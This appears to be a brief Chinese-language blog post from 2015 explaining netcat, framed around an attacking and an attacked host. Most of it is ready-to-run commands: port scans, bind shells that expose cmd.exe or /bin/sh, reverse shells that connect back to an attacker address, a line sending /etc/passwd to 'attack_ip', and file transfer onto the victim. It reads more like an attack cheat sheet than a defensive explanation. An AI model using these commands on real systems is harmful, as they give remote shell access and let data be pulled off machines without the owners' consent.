分类: 网络与安全
2015-03-07 14:26:22
netcat建成nc,linux系统都自带该程序,一个类似linux的cat命令的程序,cat是打印文件内容到命令行,netcat就是打印网络上的主机的文件内容到命令行。
实际上nc还有很多用法,必须远程上传下载文件,获取目的主机shell等,由于nc小巧、方便、功能实用,使得这个程序变的很流行。
注意nc是个后门程序,攻击主机和被攻击主机必须有一方开起监听端口,另外一方连接成功后才可以执行相关命令。
nc -vv ip port
例:nc -vv 192.168.1.1 5000 扫描192.168.1.1的tcp 5000端口
nc -vv -w secs ip port-port
例:nc -vv -w 5 192.168.1.1 5000-5002
扫描192.168.1.1的5000-6000端口,网络超时的时间设为5秒
注意超时时间的单位是秒不是毫秒,另外nc这个用法的扫描效率远不及nmap
被攻击主机的需要是完整版的nc,有些版本的nc没有-e这个参数。
nc -l -p port -e cmd.exe #被攻击主机如果是windows
nc -l -p port -e /bin/sh #被攻击主机是linux
攻击者连接方式很简单:
nc ip port
攻击主机先开始监听端口:
nc -vv -l -p port
被攻击主机连接攻击者监听的端口:
nc -e cmd.exe ip port #被攻击主机如果是windows
nc -e /bin/sh ip port #被攻击主机是linux
攻击主机先开始监听:
nc -d -l -p port > tmp
被攻击主机再开始传送文件:
nc attack_ip port < /etc/passwd
攻击主机先开始监听:
nc -d -l -p port < tmp
被攻击主机再开始下载文件:
nc attack_ip port > tmp
